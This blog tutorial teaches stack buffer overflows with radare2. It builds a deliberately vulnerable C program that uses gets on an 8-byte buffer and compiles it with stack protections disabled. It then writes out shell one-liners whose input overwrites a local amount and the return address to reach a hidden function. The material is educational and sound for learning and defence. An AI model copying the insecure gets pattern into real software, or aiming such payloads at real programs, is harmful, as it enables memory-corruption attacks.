Understanding buffer overflows using Radare2 Jan 6 2020

Many people have heard about the perils of buffer overflows, but it's something different to hear about it and another to try to make one yourself and play with it. In this post, we'll explore the basics of buffer overflow and create an example to understand them better.

We'll be using radare2, so if you need to install it, go ahead and read the instructions in their GitHub repository.

Let's start by creating a small program to analyse and exploit with a buffer overflow.

Building an exploitable executable

Buffer overflows have been on the radar for security researchers and compiler developers for a long time, but it's always fun to explore the topic. To make our exploration of buffer overflows easier, we are going to create our own program, so we don't spend too much time trying to figure out what the program does.

We are going to simulate a program that receives a bank account to make a fixed deposit (let say 10 pounds). The program will also "simulate" having one more method that is currently not accessible form our main. Let's create a new file, bank_donation.c, that has the following content:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <stdio.h>
#include <string.h>

int all_accounts_balance() {
        printf("ALL ACCOUNTS:\nBalance\n");
        return 0;
}

void deposit(char *account, int amount) {
        printf("Deposited: %d, into account: %s.\n", amount, account);
}

int main(int argc, char *argv[]){
        char account[8];
        int amount = 10;
        printf("Welcome to Shadee Bank\n");
        printf("Account number to deposit (8) digits: ");
        gets(account);
        deposit(account, amount);
        printf("Thanks, bye.\n");
        return 0;
}

Simple enough. We deposit ten pounds into the account, and that's it. There is no way for us to access the all_accounts_balance method form main, which is ok also.

As I mentioned before, buffer overflows have been studied for a long time, so it's no wonder that the compilers default settings create "safe" executables. Or at least they make the exploitation of buffer overflows harder. To begin, we are going to generate an exploitable executable. To do this, we are going to compile our file with the following command:

1
$ gcc -no-pie -fno-stack-protector -o bank_donation bank_donation.c

I'll explain the -no-pie and -fno-stack-protector later after we have a little more context to understand them better. In the meantime, it's enough to know that it generates an executable that allows us easy access to study buffer overflows.

Alright, we now have the executable we'll work with. Time to get into radare2 and start exploring.

Explorations and exploitations

We can use radare2 to perform static and dynamic analysis. Static means, we decompile the code and read through it and try to make sense of what the program does. Dynamic means, we run the program in a debugger and see it in action. In my previous post, we did some static analysis when learning how to patch a binary using radare2. On this post, we'll do some dynamic analysis.

Let's start by running Radare in debug mode for our binary:

1
2
$ r2 -d bank_donation
>

We can now get more info about our binary. For example, we can show the symbol table using is:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
> is
[Symbols]
# Removing some of the symbols to make the display cleaner
nth paddr       vaddr      bind   type   size name
――――――――――――――――――――――――――――――――――――――――――――――――――
1    0x00000238 0x00400238 LOCAL  SECT   0    .interp
2    0x00000254 0x00400254 LOCAL  SECT   0    .note.ABI-tag
...
48   0x00000577 0x00400577 GLOBAL FUNC   23   all_accounts_balance
...
52   0x0000058e 0x0040058e GLOBAL FUNC   44   deposit
...
62   0x000005ba 0x004005ba GLOBAL FUNC   104  main
...

In the symbols table, we can see the virtual address of our methods, that will come in handy. Let's now let Radare analyse the binary so it has more context and we get useful information when debugging.

1
2
3
4
5
6
7
8
9
> aaa
[x] Analyse all flags starting with sym. and entry0 (aa)
[x] Analyse function calls (aac)
[x] Analyse len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.

Alright, now let's set a breakpoint to main:

1
> db main 

Remember you can (and I strongly encourage you to do it) check the help for each command by adding a ? sign after the command.

Let's continue the execution of the program using dc.

1
2
> dc
hit breakpoint at: 4005ba

Ok, now the debugger had paused execution in our main function. Let's see the decompiled version:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
> pdf
  ; DATA XREF from entry0 @ 0x4004ad
  ;-- rax:
  ;-- rip:
┌ 104: int main (int argc, char **argv, char **envp);; var int64_t var_20h @ rbp-0x20
│ ; var int64_t var_14h @ rbp-0x14
│ ; var int64_t var_ch @ rbp-0xc
│ ; var int64_t var_4h @ rbp-0x4
│ ; arg int argc @ rdi
│ ; arg char **argv @ rsi
│ 0x004005ba b    55             push rbp
│ 0x004005bb      4889e5         mov rbp, rsp
│ 0x004005be      4883ec20       sub rsp, 0x20
│ 0x004005c2      897dec         mov dword [var_14h], edi    ; argc
│ 0x004005c5      488975e0       mov qword [var_20h], rsi    ; argv
│ 0x004005c9      c745fc0a0000.  mov dword [var_4h], 0xa
│ 0x004005d0      488d3d1b0100.  lea rdi, str.Welcome_to_Shadee_Bank ; 0x4006f2 ; "Welcome to Shadee Bank"
│ 0x004005d7      e884feffff     call sym.imp.puts           ; int puts(const char *s)
│ 0x004005dc      488d3d2d0100.  lea rdi, str.Account_number_to_deposit__8__digits: ; 0x400710 ; "Account number to deposit (8) digits: "
│ 0x004005e3      b800000000     mov eax, 0
│ 0x004005e8      e883feffff     call sym.imp.printf         ; int printf(const char *format)
│ 0x004005ed      488d45f4       lea rax, [var_ch]
│ 0x004005f1      4889c7         mov rdi, rax
│ 0x004005f4      b800000000     mov eax, 0
│ 0x004005f9      e882feffff     call sym.imp.gets           ; char *gets(char *s)
│ 0x004005fe      8b55fc         mov edx, dword [var_4h]
│ 0x00400601      488d45f4       lea rax, [var_ch]
│ 0x00400605      89d6           mov esi, edx
│ 0x00400607      4889c7         mov rdi, rax
│ 0x0040060a      e87fffffff     call sym.deposit
│ 0x0040060f      488d3d210100.  lea rdi, str.Thanks__bye.   ; 0x400737 ; "Thanks, bye."
│ 0x00400616      e845feffff     call sym.imp.puts           ; int puts(const char *s)
│ 0x0040061b      b800000000     mov eax, 0
│ 0x00400620      c9             leave
└ 0x00400621      c3             ret

In normal circumstances, you'll probably go step by step, figuring out what the program does, writing your comments, maybe pull pen and paper and write some interesting addresses to check, etcetera. But in our case, we are going to go straight to the interesting bits, so we don't get distracted by other details.

You might have seen a warning when you were compiling the code. The warning would say something like:

1
bank_donation.c:(.text+0x83): warning: the `gets' function is dangerous and should not be used.

We are going to check why that is the case, so let's add a breakpoint when we call gets.

1
> db 0x004005f9

Let's continue the execution and see what is going on:

1
2
3
4
> dc
Welcome to Shadee Bank
hit breakpoint at: 4005f9
>

Oh good, we got our welcome message. Let's see what's on our registers and what is going on on the stack:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
> dr
dr
rax = 0x00000000
rbx = 0x00000000
rcx = 0x00000000
rdx = 0x00000000
r8 = 0x7f4f81d294c0
r9 = 0x00000000
r10 = 0x00000003
r11 = 0x7f4f81780e80
r12 = 0x00400490
r13 = 0x7ffc7493e2b0
r14 = 0x00000000
r15 = 0x00000000
rsi = 0x00400710
rdi = 0x7ffc7493e1c4
rsp = 0x7ffc7493e1b0
rbp = 0x7ffc7493e1d0
rip = 0x004005f9
rflags = 0x00000202
orax = 0xffffffffffffffff
>  pxQ @ rsp
0x7ffc7493e1b0 0x00007ffc7493e2b8
0x7ffc7493e1b8 0x0000000100400490
0x7ffc7493e1c0 0x00007ffc7493e2b0
0x7ffc7493e1c8 0x0000000a00000000
0x7ffc7493e1d0 0x0000000000400630
0x7ffc7493e1d8 0x00007f4f8173db97
...
# removed to keep the output clean

Your addresses would probably be different but we would have similar content on the Stack. Let me add some comments to it:

1
2
3
4
5
6
7
8
 >  pxQ @ rsp
0x7ffc7493e1b0 0x00007ffc7493e2b8
0x7ffc7493e1b8 0x0000000100400490
0x7ffc7493e1c0 0x00007ffc7493e2b0
0x7ffc7493e1c8 0x0000000a00000000 # Our local variable amount with value 10!
0x7ffc7493e1d0 0x0000000000400630 # Previous RBP
0x7ffc7493e1d8 0x00007f4f8173db97 # Return address
...

A small detour to refresh how the calling convention in assembly works

I'm not going to explain the different types of calling conventions that exist or go into much detail. There is plenty of information on this out there. I'll just explain the basics so we can continue with our example. If you already know how the calling convention and the stack work together, skip to the next section.

In assembly when we call a function (main in our example) we add to the stack the address of the instruction to return to (the one after the call). Let's see an oversimplified example:

1
2
3
4
5
6
7
8
9
10
11
12
0x00001 mv eax 1
0x00004 call my_func
0x00008 add ebx eax 
...
my_func
0x00018 push ebp
0x0001c mov ebp esp
0x00020 sub esp, 0x4
0x00024 add eax 1
0x00028 mov esp, ebp
0x0002c leave
0x00030 ret

On address 0x00001 we have a move to eax then we call our function, the function stores the previous EBP in the stack (the EBP is where the stack of the current frame begins). We subtract 0x4 from our stack pointer (esp), giving us space for our local variables. We don't use the stack in our oversimplified function, so it's not necessary but stay with me. We add 1 to eax then, remove the "space" we reserved in the stack for our local variables, by setting our stack pointer back to the base pointer. Then we execute leave. The instruction leave is equivalent to:

1
2
mov esp ebp
pop ebp

That leaves the stack precisely as it was before the execution of our function. In the top of the stack, we'll find the address to return to. That address will be 0x00008 in our case, right after the call to my_func.

What happened here is that we stored information on our stack so the program can call the function and make use of the stack and registers, and then restore to the state that the stack was previous to the call.

Let's see how the stack looked in our trivial example, before the call (I'll assume the stack stars at 0x1010):

1
2
3
0x1010 0x00FFF # EBP
0x100c 0x00000 # local variable One with value zero
0x1008 ....... #Nothing yet but the Stack pointer (ESP) points here.

When we call our function, our stack looks like this:

1
2
3
4
0x1010 0x00FFF # EBP
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 ....... #Nothing yet but the Stack pointer (ESP) points here.

We land on the function in address (0x00018):

1
2
3
4
5
6
7
8
my_func
0x00018 push ebp        # <= Executing this
0x0001c mov ebp esp
0x00020 sub esp, 0x4
0x00024 add eax 1
0x00028 mov esp, ebp
0x0002c leave
0x00030 ret

So we push the EBP into the stack, so our stack looks like this:

1
2
3
4
5
0x1010 0x00FFF # EBP points to address 0x1000
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 0x1010  # Stores the EBP of the previous stack 
0x1000 ....... # Nothing yet but the Stack pointer (ESP) points here.

We now set our EBP to be where ESP is currently located at:

1
2
3
4
5
6
7
8
my_func
0x00018 push ebp        
0x0001c mov ebp esp  # <= Executing this
0x00020 sub esp, 0x4
0x00024 add eax 1
0x00028 mov esp, ebp
0x0002c leave
0x00030 ret

Our stack now looks like this:

1
2
3
4
5
0x1010 0x00FFF # EBP points to address 0x1000
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 0x1010  # Stores the EBP of the previous stack 
0x1000 ....... # EBP and ESP point here 

Execute sub esp, 0x4 to reserve some space for our local variables, so our Stack looks like this:

1
2
3
4
5
6
0x1010 0x00FFF # EBP points to address 0x1000
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 0x1010   # Stores the EBP of the previous stack 
0x1000 ....... # EBP point here 
0x0FFc ....... # ESP points here

We add one to eax and then start with the clean-up of our function. We "free" the space we had reserved for our local variables by returning the ESP to the base of our frame (ESP).

1
2
3
4
5
0x1010 0x00FFF # EBP points to address 0x1000
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 0x1010  # Stores the EBP of the previous stack 
0x1000 ....... # EBP and ESP point here 

We now execute leave:

1
2
3
4
5
6
7
8
my_func
0x00018 push ebp        
0x0001c mov ebp esp  
0x00020 sub esp, 0x4
0x00024 add eax 1
0x00028 mov esp, ebp
0x0002c leave # <= Executing this
0x00030 ret

And our stack looks like this:

1
2
3
4
0x1010 0x00FFF # EBP points Again points here
0x100c 0x00000 # local variable One with value zero
0x1008 0x00008 # The address of the instruction right after the call to my_func
0x1004 ...  # ESP POINTS to this address

EBP pointed to what was on the top our stack which was 0x1010. Now we only have ret that will extract what is on the top of our stack, in our case 0x00008, and continue the execution there:

1
2
3
4
5
6
7
8
9
10
11
12
0x00001 mv eax 1
0x00004 call my_func
0x00008 add ebx eax  # <= Back here
...
my_func
0x00018 push ebp
0x0001c mov ebp esp
0x00020 sub esp, 0x4
0x00024 add eax 1
0x00028 mov esp, ebp
0x0002c leave
0x00030 ret

And our stack is as we had it before the call. I hope that was a helpful refresher on how the stack works. If you would like to know more, have a look at Open Security Training Intro to x86.

Let's get back to our example.

Looking at our stack

Remember where we left off? We were debugging our program in Radare2, and we set a break before calling gets the "dangerous" function we got the warning when compiling. And we were looking at our stack.

1
2
3
4
5
6
7
8
 >  pxQ @ rsp
0x7ffc7493e1b0 0x00007ffc7493e2b8
0x7ffc7493e1b8 0x0000000100400490
0x7ffc7493e1c0 0x00007ffc7493e2b0
0x7ffc7493e1c8 0x0000000a00000000 # Our local variable amount with value 10
0x7ffc7493e1d0 0x0000000000400630 # Previous RBP
0x7ffc7493e1d8 0x00007f4f8173db97 # Return address
...

We have a local variable here, with the value of 10 (0xA in hex). Alright, let's execute the next instruction and check the stack after (I'll add characters instead of digits, so they are easier to spot on the stack):

1
2
3
> dsu 0x004005fe
Account number to deposit (8) digits: AAAAAAB
>

We are going to step-until after the gets instruction. Let's examine the stack:

1
2
3
4
5
6
7
8
> pxQ @ rsp
0x7ffc7493e1b0 0x00007ffc7493e2b8
0x7ffc7493e1b8 0x0000000100400490
0x7ffc7493e1c0 0x414141417493e2b0
0x7ffc7493e1c8 0x0000000a00424141
0x7ffc7493e1d0 0x0000000000400630
0x7ffc7493e1d8 0x00007f4f8173db97
...

0x41 represents the letter A and 0x42 represents the letter B, so you can see that we have: Six letters "A", one letter B, and one Null (0x00 to terminate the string). After that, we see 0xA, which is our amount 10.

What if we wanted to change that value to something else? Let's say what if we wanted to deposit 50 pounds instead of ten. We could do it by making the account number "overflow" its designated space and start writing on other parts of our stack.

50 in hex is 0x32 let's make that our input!

Overflowing the stack

On a different shell, we'll execute the command and add the additional characters. We know that "A" is 0x41 but how do we write 0x32? If we check the man page of ASCII we see that 0x32 is "2", so that is easy:

1
2
3
4
5
$ ./bank_donation
Welcome to Shadee Bank
Account number to deposit (8) digits: AAAAAAB 2
Deposited: 50, into account: AAAAAAB 2.
Thanks, bye.

Oh!

What if we wanted only to deposit 8 pounds? We have a problem where, if you check the ASCII man page you see that to get decimal 8 (hex 0x8) we need the character backspace. But we can't type the character backspace without deleting the letters so how do we do it?

With a little help from my friends

When doing reverse engineering, you'll need to get familiar with a scripting language. In the end, it doesn't matter which, each one has its advantages and drawbacks. So just pick one, and wield it like a pro. We can use any scripting language you prefer. I like ruby, so that's what I'll show first:

1
2
3
4
$ ruby -e 'print "A"*6; print "B\x00\x08"' | ./bank_donation
Welcome to Shadee Bank
Account number to deposit (8) digits: Deposited: 8, into account: AAAAAAB.
Thanks, bye.

But you can use any other scripting language you prefer:

1
2
3
$ echo -e   "AAAAAAB\x00\x08" | ./bank_donation
$ printf "AAAAAAB\x00\x08" | ./bank_donation
$ perl -e 'print "A" x 6 . "B\x00\x08"' | ./bank_donation

Alright, we did it! We took advantage of a buffer overflow. What else can be done?

Changing the flow

Remember what we had in our stack? We had this:

1
2
3
4
5
6
7
8
 >  pxQ @ rsp
0x7ffc7493e1b0 0x00007ffc7493e2b8 r13+8 
0x7ffc7493e1b8 0x0000000100400490
0x7ffc7493e1c0 0x00007ffc7493e2b0 r13
0x7ffc7493e1c8 0x0000000a00000000         # Our local variable amount with value 10!
0x7ffc7493e1d0 0x0000000000400630 sym.__libc_csu_init # Previous RBP
0x7ffc7493e1d8 0x00007f4f8173db97                     # Return address
...

We manage to overwrite what was located at 0x7ffc7493e1c8 which was 0x0000000a or the amount ten we set on the program.

What happens if we keep writing until we reach 0x7ffc7493e1d8?

That is the return address. We could replace that return address and change it to be the address of our function: all_accounts_balance. Let's do just that.

Debugging in radare2 like a champ

We previously did a debug run using Radare's REPL (Read Eval Print Loop), sometimes that is enough, but r2 also provides a "visual" debugger that offers more visibility into what is going on.

Every time we wanted to check the stack we had to run the command pxQ @ rsp, what if I told you that you could see the stack changes going on "live" and your registers at the same time? That would be great, right? Enter, V! (visual mode).

Let's reopen the executable:

1
2
3
4
5
6
7
8
9
> ood
# analyse the code
> aaa
# set a breakpoint to main
> db main
# continue executing until next breakpoint
> dc
# Enter Visual mode
> v!

That should show you a view with different sections. You'll see something similar to the following image:

radare2 visual interface

The graphic interface tries to accommodate mouse using folks and keyboard using folks, but it ends up in a middle way that I'm still unsure if it's successful or not.

Anyways, it is useful for certain tasks. Like viewing the stack change with every step of the debug.

Let me try to explain the interface.

  1. Menu items accessible by pressing m or clicking. You can use your arrows once you've activated the menu. (Or use vim navigation h, j, k, and l).
  2. You can see that the interface supports multiple tabs. Each tab can have a different layout. You can enter the tab mode using t.
  3. You can view the disassembly of the current program. Where you can add or comments, the line that will have the comment is the top line in the current panel.
  4. You can see the Instruction Pointer (rip ) and can hit s to step or S to step-over.
  5. You can see the stack on the next panel. Remember you can edit the command being run on the panel by pressing e. I for example sometimes change it to pxQ 128@ rsp to display the stack for 64 bits in a clearer way for me.
  6. You can have as many panels as you want you can split panels using - to split horizontally, and | to split them vertically. Find a configuration that is useful for you.
  7. You can switch to graph mode using [space]. As with other panels you can use vim's navigation h to move right, l to move left, j down, and k up.

Let me give you some general tips. Be careful where you click on the interface. Don't use the mouse to "select" (or switch) a panel (use tab to change panels). Radare will assume you are selecting the element you clicked, and depending on what is the current panel type is it'll highlight it, or try to show/jump to it on your current panel or the first panel. Use ? to see what options you have for each panel or mode. The graphic interface has different modes, command mode, window mode, graph mode, or "panel" mode. I encourage you to play around with the panels. Read the help, and try to customise it to your heart's content. One of the most useful commands for the panels is e, where you can change the command being run on the panel. And finally, you can close a panel by pressing X (capital X).

Alright, that was a very brief introduction to radare2's graphical interface. A very long post can be done on the graphic interface, but this is not it if you want to learn more you should check radare2 book.

You'll probably learn a lot by playing with the visual interface for a couple of hours. An ounce of practice is worth a pound of reading (or something like that).

Let's go back to our example.

Working with stdin and stdout

We have loaded the executable to Radare and are ready to start debugging. There is something that we have to sort out before we continue debugging. So, quit Radare, we'll start again soon.

Let me explain. In visual mode, many things are going on at the same time, and this causes problems when reading from STDIN (Standard Input) or writing to STDOUT(Standard Output). There is no easy way to distinguish what goes to the debugged program and what goes to radare2. When we were using radare2 REPL, it was easier to stop the REPL and read form STDIN for the program we were debugging. In visual mode, we have to work around it.

The good news is that Radare provides a nice utility to execute a program and tweak its inputs and outputs. The utility's name is rarun2. We can create a Rarun script and tell r2 to execute that script to run our debugged program.

There are a few interesting ways to handle the input and output of a program. For example, we could use another terminal as the stdio for the current program, let's get the terminal's file descriptor by using the tty command:

1
2
3
$ tty
# you'll get something like:
# /dev/pts/0

Now, let's create a rarun2 script, name it tty.rr2 and add the following content:

1
2
#!/usr/bin/env rarun2
stdio=/dev/pts/0

What this will do is that it'll use the stdin and stdout on the other terminal as its input and output.

To prevent the shell running on the terminal from getting confused between commands for the shell and commands for the program we are going to run on r2 we'll run the command sleep for a long time. The shell will ignore any input while it is sleeping, preventing it from trying to execute what we are typing.

Let's do a test run, on the terminal that we ran tty run sleep 99999:

1
$ sleep 99999

Now on the terminal where we are going to run r2, execute it with the following command:

1
2
3
4
5
6
7
8
$ r2 -e dbg.profile=tty.rr2 -d bank_donation
> 
# Lets analyse the code
> aaa
# lets create a breakpoint at main
> db main
# and let it continue
> dc

If you check your other terminal, you won't be seeing anything at the moment. It might be useful to put the two terminals side by side. Now hit continue again on the debugger:

1
> dc

And now you'll see the output correctly displayed on the other terminal :).

Experiment with it for a while, so you get the hang of it, exit when finished (you can Ctrl+c to stop the sleep).

I believe you can see how this can be useful, but we get the same problem when we want to add non-visible characters like BackSpace. How do we overcome that problem?

Well, it's not that hard. You know that stdin and stdout are only file descriptors. So we can set a file to be the stdin for the command and another file to be the stdout. Let's create another rarun2 script file with a different configuration. Let's call it files.rr2 and add the following content:

1
2
3
#!/usr/bin/env rarun2
stdin=stdin.txt
stdout=stdout.txt

We can create our stdin.txt and stdout.txt with the following commands:

1
2
$ ruby -e 'print "A"*6; print "B\x00\x08"' > stdin.txt
$ touch stdout.txt

Now on a different terminal, we can keep a tail -f running on stdout to see the output of the program. We don't have to do anything with the input. It'll be taken from stdin.txt.

We can have tail running on one of the terminals:

1
$ tail -f stdout.txt

And on our working terminal, we can now run r2:

1
2
3
4
5
6
7
8
$ r2 -e dbg.profile=files.rr2 -d bank_donation
> 
# Lets analise the code
> aaa
# lets create a break point at main
> db main
# and let it continue
> dc

We can see that nothing is displayed on the tail terminal. We can now tell the program to continue and we'll see all the output on the terminal.

1
> dc

After that, we'll be able to see the output on the terminal running the tail command.

Now we can debug our program without having to worry about the inputs and outputs. You can restart the debugger. We are going to do two more debugging runs, and we are done.

Visual debugging

The post is long enough now, so we are going to hurry up and do one last modification to the stack. We were going to first see what is going on on the stack using the visual debugger, and then fix our input to change the program flow.

I've been having trouble seeing the output in stdout.txt, so we are going to use another terminal to display what is going on. Find out the new terminal tty, and we'll use that on our files.rr2. This is my files.rr2 script:

1
2
3
#!/usr/bin/env rarun2
stdin=stdin.txt
stdout=/dev/pts/0

On the terminal where I ran tty and got /dev/pts/0, I'll run sleep, so it doesn't get messy with the shell output:

1
$ sleep 999999

If you haven't created stdin.txt you can create it with the following command:

1
$ ruby -e 'print "A"*6 + "B\x00\x08"' > stdin.txt

And now on my working terminal, I'll run r2:

1
2
3
4
5
6
7
8
$ r2 -e dbg.profile=files.rr2 -d bank_donation
>
# analyse the code
> aaa
# set a breakpoint at main
> db main
# let it continue until the breakpoint
> dc

Now let's go into visual mode:

1
> v!

This should open the panels. You should see your stack and the registers on your right panels and the disassembly on the left panel.

We are going to add a couple of breakpoints so we can inspect the stack. Click or navigate to Debug > Breakpoints add one at:

Alright, click continue (Debug > Continue). I'll show my stack, your addresses might be different, but you'll get the idea. Right before the gets this is my stack, we can see that at address 0x7fff49c80228 we have the 0xa which represent the 10 "pounds" we defined first.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0x7fff49c80210 0x00007fff49c80318
0x7fff49c80218 0x0000000100400490
0x7fff49c80220 0x00007fff49c80310
0x7fff49c80228 0x0000000a00000000
0x7fff49c80230 0x0000000000400630
0x7fff49c80238 0x00007f8e88dfcb97
0x7fff49c80240 0x0000000000000001
0x7fff49c80248 0x00007fff49c80318
0x7fff49c80250 0x0000000100008000
0x7fff49c80258 0x00000000004005ba
0x7fff49c80260 0x0000000000000000
0x7fff49c80268 0x051078b997922958
0x7fff49c80270 0x0000000000400490
0x7fff49c80278 0x00007fff49c80310
0x7fff49c80280 0x0000000000000000
0x7fff49c80288 0x0000000000000000

Let's hit continue and let's check the stack again:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0x7fff49c80210 0x00007fff49c80318
0x7fff49c80218 0x0000000100400490
0x7fff49c80220 0x4141414149c80310
0x7fff49c80228 0x0000000800424141 ; Now we have 8 instead of 10
0x7fff49c80230 0x0000000000400630
0x7fff49c80238 0x00007f8e88dfcb97 ; Return address after main
0x7fff49c80240 0x0000000000000001
0x7fff49c80248 0x00007fff49c80318
0x7fff49c80250 0x0000000100008000
0x7fff49c80258 0x00000000004005ba
0x7fff49c80260 0x0000000000000000
0x7fff49c80268 0x051078b997922958
0x7fff49c80270 0x0000000000400490
0x7fff49c80278 0x00007fff49c80310
0x7fff49c80280 0x0000000000000000
0x7fff49c80288 0x0000000000000000

We overwrote all the way to eight. But have a look at address 0x7fff49c80238 that is the return address we'll jump after finishing main. What if we keep on writing and replace that address with the address of the method all_accounts_balance. You can see the address by running is in r2. Go to command mode by pressing colon : type is, you'll see the address somewhere in the output:

Pro tip: (Thanks @JaroslavNahorny, this is very useful!)

You can use the Radare grep operator (~) to filter the results. You should check the help to view all the options (~?).

1
2
> is ~ all_accounts
0x00000577 0x00400577 GLOBAL FUNC   23   all_accounts_balance

You can quit command mode by typing q and hit enter.

Let's quit r2 all together we'll change our stdin.txt.

Let's recreate our stdin.txt with the correct input that will overwrite the return address. As we can see we need to write 11 bytes to reach the address and another 7 to overwrite the address completely. So we'll generate the address like this:

1
$ ruby -e 'print "A"*6 + "B\x00\x08" + "\x00"*11 + "\x77\x05\x40" + "\x00"*5' > stdin.txt

We can now rerun r2:

1
2
3
4
5
6
7
8
9
10
$ r2 -e dbg.profile=files.rr2 -d bank_donation
>
# analise the code
> aaa
# set a breakpoint at main
> db main
# let it continue until the breakpoint
> dc
# enter visual mode
> v!

Let's set a breakpoint before and after the gets. I expect you know how to do it by now. After setting the breakpoints continue the execution by selection Debug > Continue.

The stack before the gets looks as we expected:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0x7fff49c80210 0x00007fff49c80318
0x7fff49c80218 0x0000000100400490
0x7fff49c80220 0x00007fff49c80310
0x7fff49c80228 0x0000000a00000000
0x7fff49c80230 0x0000000000400630
0x7fff49c80238 0x00007f8e88dfcb97
0x7fff49c80240 0x0000000000000001
0x7fff49c80248 0x00007fff49c80318
0x7fff49c80250 0x0000000100008000
0x7fff49c80258 0x00000000004005ba
0x7fff49c80260 0x0000000000000000
0x7fff49c80268 0x051078b997922958
0x7fff49c80270 0x0000000000400490
0x7fff49c80278 0x00007fff49c80310
0x7fff49c80280 0x0000000000000000
0x7fff49c80288 0x0000000000000000

Hit continue, and let's see the stack now:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0x7fff49c80210 0x00007fff49c80318
0x7fff49c80218 0x0000000100400490
0x7fff49c80220 0x4141414149c80310
0x7fff49c80228 0x0000000800424141 ; We can see our 8
0x7fff49c80230 0x0000000000000000
0x7fff49c80238 0x0000000000400577 ; And our new return address!
0x7fff49c80240 0x0000000000000000
0x7fff49c80248 0x00007fff49c80318
0x7fff49c80250 0x0000000100008000
0x7fff49c80258 0x00000000004005ba
0x7fff49c80260 0x0000000000000000
0x7fff49c80268 0x051078b997922958
0x7fff49c80270 0x0000000000400490
0x7fff49c80278 0x00007fff49c80310
0x7fff49c80280 0x0000000000000000
0x7fff49c80288 0x0000000000000000

Now, let's add a new breakpoint right before the leave command, at addresses 0x00400620, hit continue. We'll be stopped before the leave command. Keep an eye on the stack, and press s to step. See how the address for our function all_accounts_balance is at the top of the stack. Now press s again, and see how return takes us to our function.

If you run through the function, you'll see the output displayed on our other terminal :). The program ends in a segmentation fault because we modified the stack and left it in an invalid state.

You can quit r2 now. Also, you can run the command from the terminal and get the same result:

1
2
3
4
5
6
7
$ cat stdin.txt | ./bank_donation
Welcome to Shadee Bank
Account number to deposit (8) digits: Deposited: 8, into account: AAAAAAB.
Thanks, bye.
ALL ACCOUNTS:
Balance
Segmentation fault (core dumped)

Alright, that's it for this post.

Final thoughts

We covered a lot of topics, and we didn't go deep on any of them, as you can see, there is a lot to explore. I hope this helps you to get started.

I told you I was going to explain the command we used to compile our code:

1
$ gcc -no-pie -fno-stack-protector -o bank_donation bank_donation.c

Now we have more context and can talk about what those two flags do:

As you can see, there are many safety guards now against buffer overflows, but they still exist, so it's good to know how they work.

I hope you enjoyed this post. As always, feedback is welcomed.

Related topics/notes of interest


** If you want to check what else I'm currently doing, be sure to follow me on twitter @rderik or subscribe to the newsletter. If you want to send me a direct message, you can send it to derik@rderik.com.